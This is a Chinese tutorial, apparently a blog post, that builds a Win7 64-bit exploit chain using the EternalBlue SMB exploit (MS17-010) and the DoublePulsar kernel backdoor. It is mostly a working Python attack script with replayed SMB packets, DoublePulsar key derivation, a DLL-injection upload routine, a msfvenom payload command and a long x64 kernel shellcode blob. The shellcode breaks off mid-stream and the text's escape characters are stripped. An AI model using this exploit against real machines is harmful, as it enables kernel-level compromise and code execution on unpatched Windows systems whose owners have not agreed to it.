作者:東
前言
在上一篇文章中,原文链接: http://bobao.360.cn/learning/detail/4012.html
我们构造了针对 Win7 32 位操作系统的 exploit，本节将完成一个 Win7 64 位的 exploit。下文的所有操作都只应在隔离的实验网络中、针对自己拥有的靶机进行。
上节回顾
Win7 32 位的 exploit 由两部分功能代码组成：一部分是利用 SMBv1 漏洞（MS17-010）把后门安装进内核的 Eternalblue，另一部分是驻留在内核中、之后负责接收并注入 DLL 的后门 Doublepulsar。
1. Win7 32 位与 64 位安装后门，实际是在内核中做 hook（文中写的 KiFastCallEntry 是 ntoskrnl 的内核符号 nt!KiFastCallEntry，并不在 ntdll 里）。所以内核层函数的 hook（后门安装）受内核版本和位数影响，x86 与 x64 的内核 shellcode 不能混用。
2. 注入部分。没什么可解释的：通常情况下 32 位 DLL 只能注入 32 位进程，64 位 DLL 只能注入 64 位进程；x64 系统上脚本默认注入的 explorer.exe 是 64 位进程，因此 DLL 必须是 64 位的。
想多了解些的可以读下15pb 赵神这篇 (关于32位和64位进程互读互写)
实验环境
网络环境: 局域网
攻击ip: 192.168.157.129(win7_x86)
靶机ip: 192.168.157.130(win7_x64)
工具: NSA的fb.py、wireshark、python、hex editor、
实验步骤
0x1: 一样的套路 开wireshark监听port 445捕捉到Eternalblue的数据流
0x2: 捕捉Doubleplusar动作的数据流
在六十四位下和三十二位包的数量都是一样的,可能不同就在某个字段上。
0x3: 数据包处理
接着就用上节的脚本来把Eternalblue攻击的数据包序列化供给我们的python调用
接着就是手动去分析Doubleplusar 在六十四位和三十二位的不同,参考文章:
http://bobao.360.cn/learning/detail/4074.html
发现差异在 SMB 头的 signature 字段上——这 8 字节的前 4 字节就是脚本 get_key 取用的 XOR key，紧随其后的那个字节（下面掩码中的第 10 个十六进制位）区分架构，0 为 x86、1 为 x64：
三十二位: xxxxxxxxx0xxxxxx
六十四位: xxxxxxxxx1xxxxxx
其他没什么问题。
0x4: exploit构造脚本
关于测试dll的生成:
kali-> msfvenom -p windows/x64/exec CMD="calc.exe" -f dll > /x64.dll
这样生成即可（注意输出文件名要与脚本里的 dllfile 一致：上面的命令写到 /x64.dll，而脚本读取的是 x64_calc.dll）。上面用 Doublepulsar 注入的 DLL 就是用 msfvenom 生成的；注入哪个进程随你，脚本中默认是 explorer.exe。
测试 DLL 必须是 64 位的。Doublepulsar 的注入在内核态完成，位数不匹配时通常不是注入失败，而是可能直接蓝屏（靶机崩溃）。
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import time
import ast
import binascii
import struct
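HOST ='192.168.157.130'
PORT = 445
dllfile = "x64_calc.dll"
# Seconds to wait on any single connect/send/recv on the control socket.
# Without a timeout every s.recv() in __main__ blocks forever when the
# target (or the backdoor) stops answering; with one the script fails
# loudly instead, which is what you want from an unattended run.
SOCKET_TIMEOUT = 60
# Control socket for the DoublePulsar session (the EternalBlue replay in
# Install_Backdoor opens its own connections).  Opened at import time, as
# in the original script, so merely importing this module touches the target.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(SOCKET_TIMEOUT)
s.connect((HOST, PORT))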
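def Install_Backdoor(replay_path="eternalblue.replay"):
    """Replay the captured EternalBlue exchange against HOST:PORT to plant DoublePulsar.

    The replay file is the one produced by the capture script of the previous
    article: Python literals separated by blank lines, each a tuple whose first
    element is one of "connect", "close", "send" or "recv", whose second element
    is a stream id, whose third (for "send") is the raw bytes to transmit, and
    whose last element is a delay in seconds.  ``ast.literal_eval`` is used
    deliberately: it parses literals only and never executes code, so a
    tampered replay file cannot run arbitrary Python in this process.

    Args:
        replay_path: path of the replay file (defaults to the original name).

    Raises:
        IOError/OSError: replay file unreadable, or a connection/send failed.
        ValueError/SyntaxError: an entry in the replay file is not a literal.
    """
    # NOTE: as rendered on this page every backslash escape was lost ("nn" for
    # "\n\n"); the separator between entries is a blank line.
    with open(replay_path) as fh:
        backlog = [ast.literal_eval(entry)
                   for entry in fh.read().split("\n\n") if entry.strip()]

    connections = []
    start = time.time()
    try:
        for action in backlog:
            kind, stream = action[0], action[1]
            # Timing as the original computed it: the recorded delay *plus* the
            # time spent since the previous action (it pads rather than
            # compensates; kept unchanged because the exploit was tuned with it).
            delta = action[-1] - (start - time.time())
            print(kind, delta)
            if delta > 0:
                time.sleep(delta)
            start = time.time()

            if kind == "connect":
                sock = socket.socket()
                sock.connect((HOST, PORT))
                connections.append({"socket": sock, "stream": stream})
                continue
            for conn in connections:
                if conn["stream"] != stream:
                    continue
                if kind == "close":
                    conn["socket"].close()
                elif kind == "send":
                    # sendall: send() may transmit only part of a large buffer.
                    conn["socket"].sendall(action[2])
                elif kind == "recv":
                    # Best-effort read, as in the capture; the reply is not inspected.
                    conn["socket"].recv(2048)
    finally:
        # Streams without a recorded "close" would otherwise linger until GC.
        for conn in connections:
            conn["socket"].close()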
def calculate_doublepulsar_xor_key(s):
    """Turn the 32-bit value taken from the ping reply's signature into the XOR key.

    Pure bit-twiddling, deterministic, no I/O; the result is masked to 32 bits
    so that it packs into the 4 bytes make_smb_request cycles over the payload.
    """
    low_part = ((s & 0xFF00) | (s << 16)) << 8
    high_part = ((s >> 16) | (s & 0xFF0000)) >> 8
    mixed = (2 * s) ^ (low_part | high_part)
    return mixed & 0xFFFFFFFF
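def make_unicode_host(org_host):
    """Interleave a NUL byte *before* every character of ``org_host``.

    Used to splice the target address into the UTF-16LE path of the
    TREE_CONNECT_ANDX packet built in __main__ ("\\\\HOST\\IPC$").  The NUL
    goes in front of each character because the packet text before the call
    ends on the first byte of a UTF-16 unit ("...\\x5C"), so "\\x00h\\x00o..."
    keeps the 2-byte alignment and reads as "\\\\ho...".  Only meaningful for
    ASCII hosts such as a dotted IPv4 address.

    As rendered on this page the "\\x00" escape lost its backslash; it is
    restored here.

    Args:
        org_host: ASCII host string.

    Returns:
        A string twice as long as org_host ("" for "").
    """
    return "".join("\x00" + ch for ch in org_host)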
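def get_smb_signature(smb_data):
    """Return the 4 bytes DoublePulsar uses as key material from a raw SMB reply.

    ``smb_data`` is the reply exactly as read from the socket: a 4-byte NetBIOS
    session header followed by the 32-byte SMB header.  Counting from the start
    of the buffer the SMB Signature field begins at offset 18 (4 NetBIOS +
    4 "\\xFFSMB" + 1 command + 4 status + 1 flags + 2 flags2 + 2 PID-high);
    the backdoor's reply carries its key in the first 4 of those 8 bytes.

    Raises:
        ValueError: reply shorter than 22 bytes.  The original silently
            returned a short slice, so a truncated or error reply surfaced
            later as a confusing struct.unpack failure.
    """
    if len(smb_data) < 22:
        raise ValueError("SMB reply too short (%d bytes) to hold a signature"
                         % len(smb_data))
    signature = smb_data[18:22]
    print(binascii.b2a_hex(signature))
    return signature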
def get_key(smb_data):
    """Derive the 4-byte XOR key from a DoublePulsar ping reply.

    The 4 signature bytes (see get_smb_signature) are read as a little-endian
    integer, run through calculate_doublepulsar_xor_key, and packed back
    little-endian.  Intermediate values are printed for debugging.

    Args:
        smb_data: raw ping reply as returned by s.recv (NetBIOS + SMB header).

    Returns:
        The 4-byte key that make_smb_request applies to every chunk.
    """
    signature_value = struct.unpack("<I", get_smb_signature(smb_data))[0]
    print("smb_sign: 0x%X" % signature_value)
    key_value = calculate_doublepulsar_xor_key(signature_value)
    print("int_key: 0x%X" % key_value)
    packed_key = struct.pack("<I", key_value)
    print("key: %s" % binascii.b2a_hex(packed_key))
    return packed_key
def xor_data(org_data , key):
#异或加密
newdata = ""
for i in range(len(org_data)):
newdata += chr(ord(org_data[i]) ^ ord(key[i%len(key)]))
#print binascii.b2a_hex(newdata)
return newdata
def make_smb_request(send_data , key):
data_len = len(send_data)
array = []
ncount = data_len / 4096
if (data_len % 4096) > 0:
ncount += 1
make_data =""
for i in range(ncount):
if i < ncount-1:
smb_Length = struct.pack(">H",4096 +32 +34 + 12)
#print binascii.b2a_hex(smb_Length)
totalDataCount = struct.pack("<H",4096)
byteCount = struct.pack("<H",4096 + 13)
make_data = send_data[i*4096:(i+1)*4096]
else:
smb_Length = struct.pack(">H",data_len - 4096*i +32 +34 + 12)
totalDataCount = struct.pack("<H",data_len - 4096*i)
byteCount = struct.pack("<H",data_len - 4096*i+ 13)
make_data = send_data[i*4096:]
netBIOS_header = "x00x00"+ smb_Length
smb_header = "xFFx53x4Dx42x32x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFEx00x08x42x00"
transRequest_header = "x0Fx0Cx00"+ totalDataCount +"x01x00x00x00x00x00x00x00xF0xCCx0Cx00x00x00x0Cx00x42x00"+totalDataCount+"x4Ex00x01x00x0Ex00"+ byteCount +"x00"
data_index = struct.pack(">H",i*0x10)
data_header = "x00x2Cx00x00"+totalDataCount+"x00x00"+data_index+"x00x00"
#print "data_index:",binascii.b2a_hex(data_index)
#print "data_header:",binascii.b2a_hex(data_header)
#print len(data_header)
array.append(netBIOS_header + smb_header +transRequest_header + xor_data(data_header + make_data,key))
return array , ncount
if __name__ == "__main__":
    # Stage 1: replay the captured EternalBlue exchange so the DoublePulsar
    # backdoor is resident in the target's kernel.  Nothing below can work
    # until this has succeeded; the script does not check that it did.
    Install_Backdoor()
    print "------Install backdoor done!------"
    # Stage 2: open an ordinary SMB session on socket `s` and use it to talk to
    # the backdoor, then upload and run the DLL.  The packets were captured
    # from fb.py and are replayed verbatim.  NOTE: as rendered on this page
    # every "\x" escape has lost its backslash ("x00" stands for "\x00");
    # restore them before running.
    # Original layout note: the SMB header is 32 bytes, the request block is
    # 50 bytes and the following line 30 bytes (figures as given by the author).
    #
    # Step 0: SMB_COM_NEGOTIATE (command byte 0x72) offering the dialects
    # "PC NETWORK PROGRAM 1.0" ... "NT LM 0.12" (readable as ASCII in the hex).
    step_0_data ="x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFEx00x00x40x00x00x62x00x02x50x43x20x4Ex45x54x57x4Fx52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6Fx77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54x20x4Cx4Dx20x30x2Ex31x32x00"
    s.sendall(step_0_data)
    data = s.recv(1024)
    print 0,data
    # Step 1: SMB_COM_SESSION_SETUP_ANDX (0x73) advertising "Windows 2000 2195" /
    # "Windows 2000 5.0" (the UTF-16 strings in the hex).  No password material
    # is visible, i.e. presumably a null session: no credentials are needed
    # because the backdoor intercepts the later Trans2 request inside the
    # kernel (see the article's note on the hook) before any access check.
    step_1_data ="x00x00x00x88xFFx53x4Dx42x73x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFEx00x00x40x00x0DxFFx00x88x00x04x11x0Ax00x00x00x00x00x00x00x01x00x00x00x00x00x00x00xD4x00x00x00x4Bx00x00x00x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00x2Ex00x30x00x00x00"
    s.sendall(step_1_data)
    data = s.recv(1024)
    print 1,data
    # Step 2: SMB_COM_TREE_CONNECT_ANDX (0x75) to \\HOST\IPC$ (service "?????").
    # The target address is spliced in as UTF-16LE by make_unicode_host, so the
    # NetBIOS length is computed rather than hard-coded; only its low byte is
    # filled, which assumes the packet stays under 256 bytes.  Original note:
    # two bytes of this packet differ from the x86 capture.
    str_ip = "xFFx53x4Dx42x75x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFEx00x08x40x00x04xFFx00x5ex00x08x00x01x00x33x00x00x5Cx00x5C"+ make_unicode_host(HOST)+"x00x5Cx00x49x00x50x00x43x00x24x00x00x00x3Fx3Fx3Fx3Fx3Fx00"
    step_2_data ="x00x00x00"+chr(len(str_ip))+ str_ip
    #print binascii.b2a_hex(step_2_data)
    #print step_2_data
    s.sendall(step_2_data)
    data = s.recv(1024)
    print 2,data
    # Step 3: the DoublePulsar "ping" - SMB_COM_TRANSACTION2 (0x32) with Trans2
    # subcommand 0x000E (SESSION_SETUP), MID 0x41 and no data.  An infected
    # host answers with key material in the SMB Signature field, from which
    # get_key derives the XOR key for the upload.
    # NOTE(review): the reply is never validated.  A clean host, or a failed
    # step above, still yields 4 bytes at offset 18 and the upload proceeds
    # with a meaningless key.  Public analyses describe the backdoor's reply
    # as carrying MID = request MID + 0x10 (0x51 here); checking that, and
    # that NT_STATUS (bytes 9:13) is zero on the earlier replies, would be the
    # minimum sanity check before trusting the key.
    step_3_data ="x00x00x00x4ExFFx53x4Dx42x32x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFEx00x08x41x00x0Fx0Cx00x00x00x01x00x00x00x00x00x00x00x1Fx36xCEx00x00x00x0Cx00x42x00x00x00x4Ex00x01x00x0Ex00x0Dx00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    s.sendall(step_3_data)
    response = s.recv(1024)
    print 3,response
    print 3,binascii.b2a_hex(response)
    key = get_key(response)
#shellcode+dll
kernel_shellcode ="x48x89xE0x66x83xE4xF0x41x57x41x56x41x55x41x54x53x51x52x55x57x56x50x50xE8xBCx06x00x00x48x89xC3x48xB9xDFx81x14x3Ex00x00x00x00xE8x26x05x00x00x48x85xC0x0Fx84x55x03x00x00x48x89x05x9Cx07x00x00x48xB9xBAx1Ex03xA0x00x00x00x00xE8x07x05x00x00x48x85xC0x0Fx84x36x03x00x00x48x89x05x85x07x00x00x48xB9x84x06xE7xF9xFFxFFxFFxFFxE8xE8x04x00x00x48x85xC0x0Fx84x17x03x00x00x48x89x05x6Ex07x00x00x48xB9x4FxFExEBx15x00x00x00x00xE8xC9x04x00x00x48x85xC0x0Fx84xF8x02x00x00x48x89x05x57x07x00x00x48xB9xF9x30xACxA4x00x00x00x00xE8xAAx04x00x00x48x85xC0x0Fx84xD9x02x00x00x48x89x05x40x07x00x00x48xB9xCAxBExD0xECx00x00x00x00xE8x8Bx04x00x00x48x85xC0x0Fx84xBAx02x00x00x48x89x05x29x07x00x00x48xB9xAExB8x9Fx5DxFFxFFxFFxFFxE8x6Cx04x00x00x48x85xC0x0Fx84x9Bx02x00x00x48x89x05x12x07x00x00x48xB9x94x01x69xE3xFFxFFxFFxFFxE8x4Dx04x00x00x48x85xC0x0Fx84x7Cx02x00x00x48x89x05xFBx06x00x00x48xB9xF6x10x00xB8xFFxFFxFFxFFxE8x2Ex04x00x00x48x85xC0x0Fx84x5Dx02x00x00x48x89x05xE4x06x00x00x48xB9xCAxD6x5FxD2xFFxFFxFFxFFxE8x0Fx04x00x00x48x85xC0x0Fx84x3Ex02x00x00x48x89x05xCDx06x00x00x48xB9x79xA8x24x11x00x00x00x00xE8xF0x03x00x00x48x85xC0x0Fx84x1Fx02x00x00x48x89x05xB6x06x00x00x48xB9x37xC6x90x4Fx00x00x00x00xE8xD1x03x00x00x48x85xC0x0Fx84x00x02x00x00x48x89x05x9Fx06x00x00x48xB9x6CxE7xFEx10x00x00x00x00xE8xB2x03x00x00x48x85xC0x0Fx84xE1x01x00x00x48x89x05x88x06x00x00xE8x4Fx03x00x00x8Bx05x85x06x00x00x85xC0x0Fx84xC7x01x00x00xE8xD9x01x00x00x48x85xC0x0Fx84xB9x01x00x00x4Cx8Dx0Dx94x06x00x00x41x8Bx09x51x51x6Ax40x68x00x10x00x00x4Dx31xC0x48x8Dx15xD2x05x00x00x48xB9xFFxFFxFFxFFxFFxFFxFFxFFx48x83xECx20xFFx15x06x06x00x00x48x83xC4x38x59x89x0Dx5Fx06x00x00x48x85xC0x0Fx85x22x01x00x00x48x8Dx35x57x06x00x00x48x8Bx3Dx9Cx05x00x00xF3xA4x80x3Dx2Fx06x00x00x01x74x05xE8x96x02x00x00x48x8Bx35x4Dx05x00x00x8Bx0Dx0Fx06x00x00x48x01xCEx48x89xF1x44x8Bx25x06x06x00x00x48x8Bx11x48x39xD6x0Fx84xDEx00x00x00x48x31xC0x8Bx05xDDx05x00x00x48x29xC2x51x52x48x89xD1x48x83xECx20xFFx15xC3x05x00x00x48x83xC4x20x5Ax59x48x85xC0x74x2Ex4Dx31xC9x44x8Bx0DxCEx05x00x00x4Ax8Bx04x08x48x85xC0x74x
1Bx4Cx01xE2x80x3DxBFx05x00x00x01x74x07x80x3Ax01x74x0FxEBx08x8Bx02x0FxBAxE0x05x72x05x48x8Bx09xEBx9Bx4Cx29xE2x48x89x15x0Bx05x00x00x48xBAx90x00x00x00x00x00x00x00x48x31xC9x48x83xECx40xFFx15x3Cx05x00x00x48x83xC4x40x48x85xC0x74x5Bx48x89x05xECx04x00x00xC6x80x80x00x00x00xC3x48x31xC9x51x6Ax01xFFx35xC9x04x00x00x51x4Cx8Dx88x80x00x00x00x4Dx31xC0x48x8Bx15xBFx04x00x00x48x89xC1x48x83xECx20xFFx15x02x05x00x00x48x83xC4x40x4Dx31xC9x4Dx31xC0x48x31xD2x48x8Bx0DxA6x04x00x00x48x83xECx20xFFx15xECx04x00x00x48x83xC4x20x48x83xECx20x48x8Dx0Dx4Dx04x00x00xFFx15xAFx04x00x00x48x8Bx0Dx38x04x00x00xFFx15xAAx04x00x00x48x83xC4x20x48x31xC0x48x8Dx3Dx9AxFCxFFxFFx48xB9x70x03x00x00x00x00x00x00xF3xAAx48x8Dx3Dx2Ax00x00x00x48xB9xD3x04x00x00x00x00x00x00x48x03x0DxE4x04x00x00xF3xAAx58x58x5Ex5Fx5Dx5Ax59x5Bx41x5Cx41x5Dx41x5Ex41x5Fx48x89xC4x48x31xC0xC3x53x56x51x52x48xB9x08x00x00x00x00x00x00x00x51x48x8Dx15xD1x03x00x00x48x83xECx20xFFx15x17x04x00x00x48x83xC4x20x48x85xC0x0Fx85xDDx00x00x00x48x8Bx35xB3x03x00x00x48x31xDBx8Bx1Dx66x04x00x00x8Bx04x1Ex83xF8x02x0Fx8CxB0x00x00x00x48x89xF1x48x83xECx20xFFx15xE9x03x00x00x48x83xC4x20xE8x57x02x00x00x8Bx0Dx5Ax04x00x00x39xC8x0Fx85x8Cx00x00x00x48x8Dx15x7Bx03x00x00x48x89xF1x48x83xECx20xFFx15xC6x03x00x00x48x89xF1xFFx15xC5x03x00x00x48x83xC4x20x48x85xC0x74x49x48x31xDBx8Bx1Dx0Bx04x00x00x48x8Bx04x18x48x85xC0x74x37x48x31xC9x8Bx1DxFDx03x00x00x66x8Bx0Cx18x48x8Bx44x18x08x48x85xC0x74x20x48x31xDBx8Bx1Dx02x04x00x00x48x29xD9x7Cx12x48x01xC8xE8x2Bx02x00x00x8Bx0DxEBx03x00x00x39xC8x74x3Fx31xC0x89x05x03x03x00x00x48x8Dx0Dx04x03x00x00x48x83xECx20xFFx15x62x03x00x00x48x83xC4x20x48x89xF1x48x83xECx20xFFx15x59x03x00x00x48x83xC4x20x59x81xF9x00x00x01x00x7Fx0Ex83xC1x04xE9xF3xFExFFxFFx59x48x89xF0xEBx03x48x31xC0x5Ax59x5Ex5BxC3x48x8Bx35xB7x02x00x00x8Bx0Dx79x03x00x00x48x01xCEx48x8Bx16x8Bx05x5Dx03x00x00x48x29xC2x48x31xC0x48xFFxC8x48xC1xE0x2Cx48x8Bx12x48x39xC2x72x0BxB8xE8x03x00x00x89x05x3Dx03x00x00xC3x56x51x52x48x83xECx20xFFx15x1Fx03x00x00x48x89xC6x8Bx05x36x03x00x00x48x01xC6xFFx15x05x03x00x00x48x89xF1x48x39xF0x77x17x48x8D
x90x00x05x00x00x48x39xF2x72x0Bx48x29xC6x89x35x00x03x00x00xEBx08x48x8Bx36x48x39xCEx75xDCx48x83xC4x20x5Ax59x5ExC3x53x52x51x55x48x89xE5x48x81xECx00x01x00x00x57x48x89xCFx48x89xD8x48x89x85x00xFFxFFxFFxE8xBBx00x00x00x48x89x85x08xFFxFFxFFxE8x48x01x00x00x48x89x85x10xFFxFFxFFx48x8Bx85x00xFFxFFxFFx48x8Bx8Dx08xFFxFFxFFxE8x9Ax01x00x00x48x89x85x18xFFxFFxFFx48x8Bx85x00xFFxFFxFFx48x8Bx8Dx08xFFxFFxFFxE8x8Fx01x00x00x48x89x85x20xFFxFFxFFx48x8Bx85x00xFFxFFxFFx48x8Bx8Dx08xFFxFFxFFxE8x84x01x00x00x48x89x85x28xFFxFFxFFx48x8Bx85x00xFFxFFxFFx48x89xF9x48x8Bx95x20xFFxFFxFFx48x8Bx9Dx10xFFxFFxFFxE8x0Fx01x00x00x48x89x85x30xFFxFFxFFx48x8Bx85x28xFFxFFxFFx48x8Bx8Dx30xFFxFFxFFxE8x55x01x00x00x66x89xC2x48x8Bx85x00xFFxFFxFFx48x8Bx8Dx18xFFxFFxFFxE8x49x01x00x00x5Fx48x81xC4x00x01x00x00x5Dx59x5Ax5BxC3x56x57x48x31xF6x8Bx70x3Cx48x01xC6x66x81x3Ex50x45x75x12x48x81xC6x88x00x00x00x48x31xFFx8Bx3Ex48x01xF8x5Fx5ExC3x48x31xC0xEBxF8x56x51x57x48x89xC6x48x31xC0x89xC7xC1xE7x07x29xC7x89xF8x31xC9x8Ax0Ex80xF9x00x74x07x01xC8x48xFFxC6xEBxE7x5Fx59x5ExC3x56x57x52x48x89xC6x48x31xC0x89xC7xC1xE7x07x29xC7x89xF8x31xD2x8Ax16x01xD0x48xFFxC6xE2xECx5Ax5Fx5ExC3x56x51x57x48x89xC6x48x31xC0x89xC7xC1xE7x07x29xC7x89xF8x31xC9x8Ax0Ex80xF9x00x74x0Ax01xC8x48xFFxC6x48xFFxC6xEBxE4x5Fx59x5ExC3x56x48x89xC6x48x83xC6x18x48x31xC0x8Bx06x5ExC3x53x65x48x8Bx04x25x38x00x00x00x48x8Bx40x04x48xC1xE8x0Cx48xC1xE0x0Cx48x8Bx18x66x81xFBx4Dx5Ax74x08x48x2Dx00x10x00x00xEBxEEx5BxC3x57x56x51x48x31xFFx48x89xC6x48x31xC0x8Bx04xBAx48x01xF0xE8x40xFFxFFxFFx39xC8x74x0Ex48xFFxC7x48x39xDFx74x0BxEBxE4x59x5Ex5FxC3x48x89xF8xEBxF7x48x31xC0xEBxF2x56x48x89xC6x48x31xC0x8Bx41x1Cx48x01xF0x5ExC3x56x48x89xC6x48x31xC0x8Bx41x20x48x01xF0x5ExC3x56x48x89xC6x48x31xC0x8Bx41x24x48x01xF0x5ExC3x48xD1xE1x48x01xC8x66x8Bx00xC3x48x81xCAx00x00xFFxFFx48x81xF2x00x00xFFxFFx48xC1xE2x02x48x01xD1x48x31xD2x8Bx11x48x01xD0xC3x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x0
0x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x28x03x00x00x20x00x00x00x70x00x00x00x08x03x00x00x4Cx00x00x00xC8x02x00x00x01x00x00x00xBDxA2x37x83x00x00x00x00x00x00x00x00x8Ax23x00x00x00x00x00x00x53x55x57x56x41x54x41x55x41x56x41x57x48x89xE0x48x89xE1x48x83xE1x08x48x29xCCx48x81xECx00x04x00x00xE8x00x00x00x00x5Dx48x89xE6x48x89x06x48x81xECx00x04x00x00x48x8Dx3DxD2x0Ex00x00x49x89xF0x48x83xC6x08x48x31xC9x8Ax0Fx84xC9x74x3Fx48xFFxC7x8Bx0Fx48x83xC7x04x8Bx17x48x83xC7x04x84xD2x74x2CxE8xD4x0Dx00x00x51x0FxB6x0Fx48x85xC9x59x75x09x48x85xC0x0Fx84xB9x0Dx00x00x48x89x06x48x83xC6x08x30xC0x48x83xC7x01x3Ax47x04x74xCCxEBxB8x4Cx89xC6x48x89x25x3Dx0Dx00x00x48x89x2Dx3Ex0Dx00x00x48x89x35x3Fx0Dx00x00x90xE8x00x00x00x00x59x4Dx31xC9x49x89xC8x48x31xD2xB2x01x48x8Dx0Dx2Ex0Dx00x00x48x83xECx20xFFx56x38x48x83xC4x20x49xB9x40x00x00x00x00x00x00x00x49xB8x00x30x00x00x00x00x00x00x48x31xD2x8Bx95x5Dx0Fx00x00x48x31xC9x48x83xECx20xFFx56x08x48x83xC4x20x48x85xC0x0Fx84xCFx0Cx00x00x48x89xC3x56x8Bx8Dx5Dx0Fx00x00x48x8Dx35x80x0Ex00x00x48x89xDFxF3xA4x5Ex48x89x5Ex48x48x31xC0x8Bx85x5Dx0Fx00x00x48x89x46x50x48x31xC9x8Bx8Dx5Dx0Fx00x00x48x8Dx3Dx59x0Ex00x00x31xC0xF3xAAx48x31xC0x48x89x46x58x48x89x46x60x48x89x46x68x48x8Dx05x77x09x00x00x48x89x05xC4x02x00x00x48x8Dx05x71x09x00x00x48x89x05xBEx02x00x00x48x8Dx05x78x09x00x00x48x89x05xB8x02x00x00x48x8Dx05x86x09x00x00x48x89x05xB2x02x00x00x48x8Dx05xA7x08x00x00x48x89x05xACx02x00x00x55x48x8Dx2DxD6x01x00x00x48x8Bx7Ex48xE8xA3x02x00x00x48x85xC0x0Fx85x13x01x00x00xE8x1Ax03x00x00x48x85xC0x0Fx84x05x01x00x00x48x89x45x20x48x8Bx7Dx08x48x83xC7x30x48x8Bx3Fx48x8Bx45x20x48x29xF8x48x89x45x28xE8x64x03x00x00x48x85xC0x0Fx85xDDx00x00x00xE8xE6x03x00x00x48x85xC0x0Fx85xCFx00x00x00xE8x4Ex05x00x00x48x
85xC0x0Fx85xC1x00x00x00xE8x57x05x00x00x48x85xC0x0Fx85xB3x00x00x00xE8x57x06x00x00x48x85xC0x0Fx85xA5x00x00x00xE8xBAx06x00x00x48x85xC0x0Fx85x97x00x00x00xE8xC6x07x00x00x48x85xC0x0Fx85x89x00x00x00x48x8Bx45x20x48x89x46x70x48x8Bx45x18x48x89x46x78x5Dx8Bx85x61x0Fx00x00x89x86x80x00x00x00x48x8Bx56x70x48x63x42x3Cx48x8Dx9Cx10x88x00x00x00x48x85xDBx74x48x8Bx1Bx48x01xD3x83x7Bx14x00x74x3Dx8BxBEx80x00x00x00x2Bx7Bx10x3Bx7Bx14x7Fx2Fx8Bx4Bx1Cx48x01xD1x8Bx04xB9x48x01xD0x48x83xECx20x4Cx8Bx46x50x48x8Bx56x48x48xB9x02x00x00x00x00x00x00x00xFFxD0x48x83xC4x20x48x89x86x88x00x00x00x55x48x8Dx2DxB8x00x00x00xE8x28x07x00x00xEBx00x48x8Bx4Dx78x48x85xC9x74x0Bx48x83xECx20xFFx56x40x48x83xC4x20x48x8Bx7Dx20x48x85xFFx0Fx84x8Ax00x00x00x4Cx8Dx8DxAAx00x00x00x49xB8x40x00x00x00x00x00x00x00x48x8Bx55x50x48x8Bx4Dx20x48x83xECx20xFFx56x30x48x83xC4x20x48x85xC0x74x09x48x8Bx4Dx50x48x31xC0xF3xAAx49xB8x00x80x00x00x00x00x00x00x48xBAx00x00x00x00x00x00x00x00x48x8Bx4Dx20x48x83xECx20xFFx56x10x48x83xC4x20x48x8Bx7Dx60x48x85xFFx74x2Cx48x8Bx4Dx68x48x31xC0xF3xAAx49xB8x00x80x00x00x00x00x00x00x48xBAx00x00x00x00x00x00x00x00x48x8Bx4Dx60x48x83xECx20xFFx56x10x48x83xC4x20x5DxE9x60x0Ax00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x48xB8xFFxFFxFFxFFxFFxFFxFFxFFxE9x2ExFCxFFxFFx6Dx73x76x63x72x74x2Ex64x6Cx6Cx00x6Dx73x76x63x72x74x64x2Ex64x6Cx6Cx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x57x52x53x48x89x7Dx00x48x89xFAx48x83xC2x00x66x8Bx1Ax66x81xFBx4Dx5Ax75x63x48x89xFAx48x83xC2x3Cx48x31xDBx8Bx1Ax48x01xDFx48x89x7Dx08x48x89xFAx48x83xC2x00x8Bx1Ax81xFBx50x45x00x00x75x3Fx48x89xFAx48x83xC2x18x66x8Bx1Ax66x81xFBx0Bx02
